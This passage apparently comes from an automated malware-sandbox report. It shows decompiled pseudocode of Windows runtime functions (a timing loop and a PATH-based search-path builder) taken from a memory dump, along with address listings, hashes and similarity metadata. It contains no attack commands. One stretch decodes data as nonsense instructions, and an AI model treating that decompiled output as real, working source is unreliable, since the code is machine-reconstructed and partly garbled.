				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0137CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01357D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01408F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0137AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1428628; // 0x0
								_v68 = _t77;
								_t78 =  *0x142862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1428628; // 0x0
							_t116 =  *0x142862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0135b94c
0x0135b956
0x0135b95c
0x0135b95e
0x0135b964
0x0135b969
0x0135b96d
0x0135b96d
0x0135b970
0x0135b974
0x0135b97a
0x0135badf
0x0135badf
0x0135bae2
0x0135bae4
0x0135bae6
0x0135baf0
0x013a2cb8
0x0135baf6
0x0135baf6
0x0135baf6
0x0135bafd
0x0135bb1f
0x0135bb1f
0x0135baff
0x0135bb00
0x0135bb00
0x0135bb03
0x0135bb03
0x0135bacb
0x0135bacf
0x0135bad0
0x0135bad1
0x0135badc
0x0135badc
0x0135b980
0x0135b980
0x0135b988
0x0135b98b
0x0135b98d
0x0135b990
0x0135b993
0x0135b999
0x0135b99b
0x0135b9a1
0x0135b9a5
0x0135b9aa
0x0135b9b0
0x0135b9bb
0x0135b9c0
0x0135b9c3
0x0135b9ca
0x0135b9cc
0x0135b9cf
0x0135b9d3
0x0135b9d7
0x0135ba94
0x0135ba94
0x0135ba98
0x0135baa3
0x013a2ccb
0x0135baa9
0x0135baa9
0x0135baa9
0x0135bab1
0x013a2cd5
0x013a2cdd
0x013a2cdd
0x0135babb
0x0135babc
0x0135bac2
0x0135bac3
0x0135bac3
0x0135bac6
0x00000000
0x0135b9dd
0x0135b9dd
0x0135b9e7
0x0135b9e7
0x0135b9ec
0x0135b9ec
0x0135b9f1
0x0135b9f5
0x0135b9fa
0x0135ba00
0x0135ba0c
0x0135ba10
0x0135ba10
0x0135ba12
0x0135ba18
0x00000000
0x00000000
0x0135bb26
0x0135bb26
0x0135ba1e
0x0135ba1e
0x0135ba23
0x0135ba25
0x0135ba2c
0x0135ba30
0x0135ba35
0x0135ba35
0x0135ba41
0x0135ba46
0x0135ba4c
0x0135ba50
0x0135ba54
0x0135ba6a
0x0135ba6e
0x0135ba70
0x0135ba74
0x0135ba78
0x0135ba7a
0x0135ba7c
0x0135ba8e
0x0135ba90
0x0135ba92
0x0135bb14
0x0135bb14
0x0135bb16
0x0135bb16
0x00000000
0x0135ba7c
0x0135bb0a
0x0135bb0d
0x00000000
0x00000000
0x00000000
0x0135bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0135B9A5

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: ecacd2232b0185fd95298b6c627688903b9bf675cd360b623f0c63ac3b27ec7b
Instruction ID: 782688a6800506b5e914eadab03bf1d337a5b2780523b5bd02aa0ac9c03d6327
Opcode Fuzzy Hash: ecacd2232b0185fd95298b6c627688903b9bf675cd360b623f0c63ac3b27ec7b
Instruction Fuzzy Hash: 49515971A08345CFD761CF2DC48092AFBFAFB88A18F54496EE98587359D770E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01362581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E01362581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t230;
				signed int _t234;
				void* _t235;
				void* _t236;
				signed int _t241;
				signed int _t243;
				intOrPtr _t245;
				signed int _t248;
				signed int _t255;
				signed int _t258;
				signed int _t266;
				intOrPtr _t272;
				signed int _t274;
				signed int _t276;
				void* _t277;
				void* _t278;
				signed int _t279;
				unsigned int _t282;
				signed int _t286;
				intOrPtr* _t287;
				signed int _t288;
				signed int _t292;
				intOrPtr _t304;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t320;
				signed int _t321;
				signed int _t323;
				signed int _t325;
				signed int _t327;
				void* _t328;
				void* _t330;

				_t325 = _t327;
				_t328 = _t327 - 0x4c;
				_v8 =  *0x142d360 ^ _t325;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t320 = 0x142b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t282 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t272 = 0x48;
				_t302 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t313 = 0;
				_v37 = _t302;
				if(_v48 <= 0) {
					L16:
					_t45 = _t272 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t321 = 0xc0000106;
						goto L32;
					} else {
						_t320 = L01354620(_t282,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t272);
						_v52 = _t320;
						__eflags = _t320;
						if(_t320 == 0) {
							_t321 = 0xc0000017;
							goto L32;
						} else {
							 *(_t320 + 0x44) =  *(_t320 + 0x44) & 0x00000000;
							_t50 = _t320 + 0x48; // 0x48
							_t315 = _t50;
							_t302 = _v32;
							 *((intOrPtr*)(_t320 + 0x3c)) = _t272;
							_t274 = 0;
							 *((short*)(_t320 + 0x30)) = _v48;
							__eflags = _t302;
							if(_t302 != 0) {
								 *(_t320 + 0x18) = _t315;
								__eflags = _t302 - 0x1428478;
								 *_t320 = ((0 | _t302 == 0x01428478) - 0x00000001 & 0xfffffffb) + 7;
								E0137F3E0(_t315,  *((intOrPtr*)(_t302 + 4)),  *_t302 & 0x0000ffff);
								_t302 = _v32;
								_t328 = _t328 + 0xc;
								_t274 = 1;
								__eflags = _a8;
								_t315 = _t315 + (( *_t302 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t266 = E013C39F2(_t315);
									_t302 = _v32;
									_t315 = _t266;
								}
							}
							_t286 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t321 = _v68;
								__eflags = 0;
								 *((short*)(_t315 - 2)) = 0;
								goto L32;
							} else {
								_t276 = _t320 + _t274 * 4;
								_v56 = _t276;
								do {
									__eflags = _t302;
									if(_t302 != 0) {
										_t230 =  *(_v60 + _t286 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t276 =  *(_v60 + _t286 * 4);
										 *(_t276 + 0x18) = _t315;
										_t234 =  *(_v60 + _t286 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M01362959))) {
												case 0:
													__ax =  *0x1428488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0137F3E0(__edi,  *0x142848c, __ax & 0x0000ffff);
														__eax =  *0x1428488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0137F3E0(_t315, _v80, _v64);
													_t261 = _v64;
													goto L26;
												case 2:
													 *0x1428480 & 0x0000ffff = E0137F3E0(__edi,  *0x1428484,  *0x1428480 & 0x0000ffff);
													__eax =  *0x1428480 & 0x0000ffff;
													__eax = ( *0x1428480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0137F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0137F3E0(_t315, _v76, _v36);
														_t261 = _v36;
													}
													L26:
													_t328 = _t328 + 0xc;
													_t315 = _t315 + (_t261 >> 1) * 2 + 2;
													__eflags = _t315;
													L27:
													_push(0x3b);
													_pop(_t263);
													 *((short*)(_t315 - 2)) = _t263;
													goto L28;
												case 6:
													__ebx =  *0x142575c;
													__eflags = __ebx - 0x142575c;
													if(__ebx != 0x142575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0137F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x142575c;
														} while (__ebx != 0x142575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1428478 & 0x0000ffff = E0137F3E0(__edi,  *0x142847c,  *0x1428478 & 0x0000ffff);
													__eax =  *0x1428478 & 0x0000ffff;
													__eax = ( *0x1428478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E013C39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1426e58 & 0x0000ffff = E0137F3E0(__edi,  *0x1426e5c,  *0x1426e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1426e58 & 0x0000ffff;
													__eax = ( *0x1426e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t286 = _v16;
													_t302 = _v32;
													L29:
													_t276 = _t276 + 4;
													__eflags = _t276;
													_v56 = _t276;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t286 = _t286 + 1;
									_v16 = _t286;
									__eflags = _t286 - _v48;
								} while (_t286 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t313 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M01362935))) {
							case 0:
								__ax =  *0x1428488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t302 =  &_v64;
								_v80 = E01362E3E(0,  &_v64);
								_t272 = _t272 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1428480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1428480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0134EEF0(0x14279a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0134EB70(__ecx, 0x14279a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t321;
												if(_t321 < 0) {
													L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t282 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1427b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01354620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0134EB70(__ecx, 0x14279a0);
										__eax = _v52;
										L36:
										_pop(_t314);
										_pop(_t322);
										__eflags = _v8 ^ _t325;
										_pop(_t273);
										return E0137B640(_t209, _t273, _v8 ^ _t325, _t302, _t314, _t322);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t268 = _v56;
								if(_v56 != 0) {
									_t302 =  &_v36;
									_t270 = E01362E3E(_t268,  &_v36);
									_t282 = _v36;
									_v76 = _t270;
								}
								if(_t282 == 0) {
									goto L44;
								} else {
									_t272 = _t272 + 2 + _t282;
								}
								goto L14;
							case 6:
								__eax =  *0x1425764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1428478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1428478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1426e58 & 0x0000ffff;
								__eax = ( *0x1426e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t313 = _t313 + 1;
								if(_t313 >= _v48) {
									goto L16;
								} else {
									_t302 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t287 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *[ss:esi+0x28] =  *[ss:esi+0x28] + _t328;
					_t235 = _t234 + _t328;
					asm("daa");
					 *[ss:esi] =  *[ss:esi] + _t325;
					 *[ss:esi+0x28] =  *[ss:esi+0x28] + _t235;
					 *[ss:0x1f013626] =  *[ss:0x1f013626] + _t235;
					_pop(_t277);
					__eflags = _t235 -  *_t287;
					_t236 = _t328;
					_t330 = _t235;
					 *_t320 =  *_t320 - _t302;
					 *0x2013a5b =  *0x2013a5b + _t320;
					 *_t320 =  *_t320 - _t320;
					 *((intOrPtr*)(_t236 - 0x9fec9d8)) =  *((intOrPtr*)(_t236 - 0x9fec9d8)) + _t236;
					asm("daa");
					 *[ss:esi] =  *[ss:esi] + _t277;
					 *_t320 =  *_t320 - _t302;
					 *((intOrPtr*)(_t320 + 0x28)) =  *((intOrPtr*)(_t320 + 0x28)) + _t287;
					 *[ss:ebp+0x27] =  *[ss:ebp+0x27] + _t277;
					_pop(_t278);
					__eflags = _t236 + _t277 -  *_t287;
					 *[ss:esp+ebx*2] =  *[ss:esp+ebx*2] + _t320;
					__eflags = 0x28 -  *_t287;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x140ff00);
					E0138D08C(_t278, _t315, _t320);
					_v44 =  *[fs:0x18];
					_t316 = 0;
					 *_a24 = 0;
					_t279 = _a12;
					__eflags = _t279;
					if(_t279 == 0) {
						_t241 = 0xc0000100;
					} else {
						_v8 = 0;
						_t323 = 0xc0000100;
						_v52 = 0xc0000100;
						_t243 = 4;
						while(1) {
							_v40 = _t243;
							__eflags = _t243;
							if(_t243 == 0) {
								break;
							}
							_t292 = _t243 * 0xc;
							_v48 = _t292;
							__eflags = _t279 -  *((intOrPtr*)(_t292 + 0x1311664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t258 = E0137E5C0(_a8,  *((intOrPtr*)(_t292 + 0x1311668)), _t279);
									_t330 = _t330 + 0xc;
									__eflags = _t258;
									if(__eflags == 0) {
										_t323 = E013B51BE(_t279,  *((intOrPtr*)(_v48 + 0x131166c)), _a16, _t316, _t323, __eflags, _a20, _a24);
										_v52 = _t323;
										break;
									} else {
										_t243 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t243 = _t243 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t323;
						__eflags = _t323;
						if(_t323 < 0) {
							__eflags = _t323 - 0xc0000100;
							if(_t323 == 0xc0000100) {
								_t288 = _a4;
								__eflags = _t288;
								if(_t288 != 0) {
									_v36 = _t288;
									__eflags =  *_t288 - _t316;
									if( *_t288 == _t316) {
										_t323 = 0xc0000100;
										goto L76;
									} else {
										_t304 =  *((intOrPtr*)(_v44 + 0x30));
										_t245 =  *((intOrPtr*)(_t304 + 0x10));
										__eflags =  *((intOrPtr*)(_t245 + 0x48)) - _t288;
										if( *((intOrPtr*)(_t245 + 0x48)) == _t288) {
											__eflags =  *(_t304 + 0x1c);
											if( *(_t304 + 0x1c) == 0) {
												L106:
												_t323 = E01362AE4( &_v36, _a8, _t279, _a16, _a20, _a24);
												_v32 = _t323;
												__eflags = _t323 - 0xc0000100;
												if(_t323 != 0xc0000100) {
													goto L69;
												} else {
													_t316 = 1;
													_t288 = _v36;
													goto L75;
												}
											} else {
												_t248 = E01346600( *(_t304 + 0x1c));
												__eflags = _t248;
												if(_t248 != 0) {
													goto L106;
												} else {
													_t288 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t323 = E01362C50(_t288, _a8, _t279, _a16, _a20, _a24, _t316);
											L76:
											_v32 = _t323;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0134EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t323 = _a24;
									_t255 = E01362AE4( &_v36, _a8, _t279, _a16, _a20, _t323);
									_v32 = _t255;
									__eflags = _t255 - 0xc0000100;
									if(_t255 == 0xc0000100) {
										_v32 = E01362C50(_v36, _a8, _t279, _a16, _a20, _t323, 1);
									}
									_v8 = _t316;
									E01362ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t241 = _t323;
					}
					L70:
					return E0138D0D1(_t241);
				}
				L108:
			}

0x01362584
0x01362586
0x01362590
0x01362596
0x01362597
0x01362598
0x01362599
0x0136259e
0x013625a4
0x013625a9
0x013625ac
0x013625ae
0x013625b1
0x013625b2
0x013625b5
0x013625b8
0x013625bb
0x013625bc
0x013625bf
0x013625c2
0x013625c5
0x013625c6
0x013625cb
0x013625ce
0x013625d8
0x013625dd
0x013625de
0x013625e1
0x013625e3
0x013625e9
0x013626da
0x013626da
0x013626dd
0x013626e2
0x013a5b56
0x00000000
0x013626e8
0x013626f9
0x013626fb
0x013626fe
0x01362700
0x013a5b60
0x00000000
0x01362706
0x01362706
0x0136270a
0x0136270a
0x0136270d
0x01362713
0x01362716
0x01362718
0x0136271c
0x0136271e
0x013a5b6c
0x013a5b6f
0x013a5b7f
0x013a5b89
0x013a5b8e
0x013a5b93
0x013a5b96
0x013a5b9c
0x013a5ba0
0x013a5ba3
0x013a5bab
0x013a5bb0
0x013a5bb3
0x013a5bb3
0x013a5ba3
0x01362724
0x01362726
0x01362729
0x0136272c
0x0136279d
0x0136279d
0x013627a0
0x013627a2
0x00000000
0x0136272e
0x0136272e
0x01362731
0x01362734
0x01362734
0x01362736
0x013a5bc1
0x013a5bc1
0x013a5bc4
0x00000000
0x013a5bca
0x013a5bca
0x013a5bcd
0x00000000
0x013a5bd3
0x00000000
0x013a5bd3
0x013a5bcd
0x0136273c
0x0136273c
0x01362742
0x01362747
0x0136274a
0x0136274d
0x01362750
0x00000000
0x01362756
0x01362756
0x00000000
0x01362902
0x01362908
0x0136290b
0x00000000
0x01362911
0x0136291c
0x01362921
0x00000000
0x01362921
0x00000000
0x00000000
0x01362880
0x01362887
0x0136288c
0x00000000
0x00000000
0x01362805
0x0136280a
0x01362814
0x01362816
0x00000000
0x00000000
0x0136281e
0x01362821
0x01362823
0x00000000
0x01362829
0x01362829
0x01362831
0x0136283c
0x0136283e
0x00000000
0x0136283e
0x00000000
0x00000000
0x0136284e
0x01362850
0x01362851
0x01362854
0x01362857
0x0136285a
0x0136285c
0x0136285d
0x00000000
0x00000000
0x0136275d
0x01362761
0x00000000
0x01362767
0x0136276e
0x01362773
0x01362773
0x01362776
0x01362778
0x0136277e
0x0136277e
0x01362781
0x01362781
0x01362783
0x01362784
0x00000000
0x00000000
0x013a5bd8
0x013a5bde
0x013a5be4
0x013a5be6
0x013a5be8
0x013a5be9
0x013a5bee
0x013a5bf8
0x013a5bff
0x013a5c01
0x013a5c04
0x013a5c07
0x013a5c0b
0x013a5c0d
0x013a5c0d
0x013a5c15
0x013a5c18
0x013a5c1b
0x013a5c1b
0x013a5c1e
0x00000000
0x00000000
0x013628c3
0x013628c8
0x013628d2
0x013628d4
0x013628d8
0x013628db
0x013a5c26
0x013a5c28
0x013a5c2d
0x013a5c2d
0x00000000
0x00000000
0x013a5c34
0x013a5c36
0x013a5c49
0x013a5c4e
0x013a5c54
0x013a5c5b
0x013a5c5d
0x013a5c60
0x01362788
0x01362788
0x0136278b
0x0136278e
0x0136278e
0x0136278e
0x01362791
0x00000000
0x00000000
0x01362756
0x01362750
0x00000000
0x01362794
0x01362794
0x01362795
0x01362798
0x01362798
0x00000000
0x01362734
0x0136272c
0x01362700
0x013625ef
0x013625ef
0x013625ef
0x013625f2
0x013625f8
0x00000000
0x00000000
0x013625fe
0x00000000
0x013628e6
0x013628ec
0x013628ef
0x013628f5
0x013628f8
0x013628f8
0x00000000
0x013628f8
0x00000000
0x00000000
0x01362866
0x01362866
0x01362876
0x01362879
0x00000000
0x00000000
0x013627e0
0x013627e7
0x013627e9
0x013627eb
0x013a5afd
0x00000000
0x013a5afd
0x00000000
0x00000000
0x01362633
0x01362638
0x0136263b
0x0136263c
0x0136263e
0x01362640
0x01362642
0x01362647
0x01362649
0x0136264e
0x01362650
0x01362653
0x01362659
0x013626a2
0x013626a7
0x013626ac
0x013626b2
0x013a5b11
0x013a5b15
0x013a5b17
0x00000000
0x013626b8
0x013626b8
0x013626ba
0x013627a6
0x013627a6
0x013627a9
0x013627ab
0x013627b9
0x013627b9
0x013627be
0x013627c1
0x013627c3
0x013627c5
0x013627c7
0x013a5c74
0x013a5c79
0x013a5c79
0x013627c7
0x00000000
0x013626c0
0x013626c0
0x013626c3
0x013626c6
0x013626c6
0x013626c9
0x013626c9
0x00000000
0x013626c9
0x013626ba
0x0136265b
0x0136265b
0x0136265e
0x01362667
0x0136266d
0x01362677
0x0136267c
0x0136267f
0x01362681
0x013a5b49
0x013a5b4e
0x013627cd
0x013627d0
0x013627d1
0x013627d2
0x013627d4
0x013627dd
0x01362687
0x01362687
0x0136268a
0x0136268b
0x0136268e
0x0136268f
0x01362691
0x01362696
0x01362698
0x0136269d
0x0136269f
0x00000000
0x0136269f
0x01362681
0x00000000
0x00000000
0x01362846
0x00000000
0x00000000
0x01362605
0x0136260a
0x0136260c
0x01362611
0x01362616
0x01362619
0x01362619
0x0136261e
0x00000000
0x01362624
0x01362627
0x01362627
0x00000000
0x00000000
0x013a5b1f
0x00000000
0x00000000
0x01362894
0x0136289b
0x0136289d
0x013628a1
0x013a5b2b
0x013a5b2e
0x013a5b2e
0x013628a7
0x013628a9
0x013a5b04
0x013a5b09
0x013a5b09
0x013a5b09
0x00000000
0x00000000
0x013a5b35
0x013a5b3c
0x013628fb
0x013628fb
0x013626cc
0x013626cc
0x013626d0
0x00000000
0x013626d2
0x013626d2
0x00000000
0x013626d2
0x00000000
0x00000000
0x013625fe
0x0136292d
0x0136292f
0x01362930
0x01362935
0x01362937
0x0136293b
0x0136293e
0x0136293f
0x01362942
0x01362947
0x0136294e
0x0136294f
0x01362951
0x01362951
0x01362952
0x01362954
0x0136295a
0x0136295c
0x01362962
0x01362963
0x01362966
0x01362968
0x0136296b
0x01362972
0x01362973
0x01362977
0x0136297b
0x0136297d
0x0136297e
0x0136297f
0x01362980
0x01362981
0x01362982
0x01362983
0x01362984
0x01362985
0x01362986
0x01362987
0x01362988
0x01362989
0x0136298a
0x0136298b
0x0136298c
0x0136298d
0x0136298e
0x0136298f
0x01362990
0x01362992
0x01362997
0x013629a3
0x013629a6
0x013629ab
0x013629ad
0x013629b0
0x013629b2
0x013a5c80
0x013629b8
0x013629b8
0x013629bb
0x013629c0
0x013629c5
0x013629c6
0x013629c6
0x013629c9
0x013629cb
0x00000000
0x00000000
0x013629cd
0x013629d0
0x013629d9
0x013629db
0x013629dd
0x01362a7f
0x01362a84
0x01362a87
0x01362a89
0x013a5ca1
0x013a5ca3
0x00000000
0x01362a8f
0x01362a8f
0x00000000
0x01362a8f
0x00000000
0x013629e3
0x013629e3
0x013629e3
0x00000000
0x013629e3
0x013629dd
0x00000000
0x013629db
0x013629e6
0x013629e9
0x013629eb
0x013629ed
0x013629f3
0x013629f5
0x013629f8
0x013629fa
0x01362a97
0x01362a9a
0x01362a9d
0x01362add
0x00000000
0x01362a9f
0x01362aa2
0x01362aa5
0x01362aa8
0x01362aab
0x013a5cab
0x013a5caf
0x013a5cc5
0x013a5cda
0x013a5cdc
0x013a5cdf
0x013a5ce5
0x00000000
0x013a5ceb
0x013a5ced
0x013a5cee
0x00000000
0x013a5cee
0x013a5cb1
0x013a5cb4
0x013a5cb9
0x013a5cbb
0x00000000
0x013a5cbd
0x013a5cbd
0x00000000
0x013a5cbd
0x013a5cbb
0x01362ab1
0x01362ab1
0x01362ac4
0x01362ac6
0x01362ac6
0x00000000
0x01362ac6
0x01362aab
0x00000000
0x01362a00
0x01362a09
0x01362a0e
0x01362a21
0x01362a24
0x01362a35
0x01362a3a
0x01362a3d
0x01362a42
0x01362a59
0x01362a59
0x01362a5c
0x01362a5f
0x01362a5f
0x013629fa
0x013629f3
0x01362a64
0x01362a64
0x01362a6b
0x01362a6b
0x01362a6d
0x01362a72
0x01362a72
0x00000000

Strings

PATH, xrefs: 01362642, 01362691

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: e0323750a8c3e07332aa0907f54aabe88ad4536485b96afa806eadc668d21663
Instruction ID: dd23005a636f035731f38313e8fde92f8ec414d7b7a9f59261576e81d1db319f
Opcode Fuzzy Hash: e0323750a8c3e07332aa0907f54aabe88ad4536485b96afa806eadc668d21663
Instruction Fuzzy Hash: 78C19371E00219DFDB25DF9DD880BAEBBF9FF48718F458029E901AB254D778A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01332D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

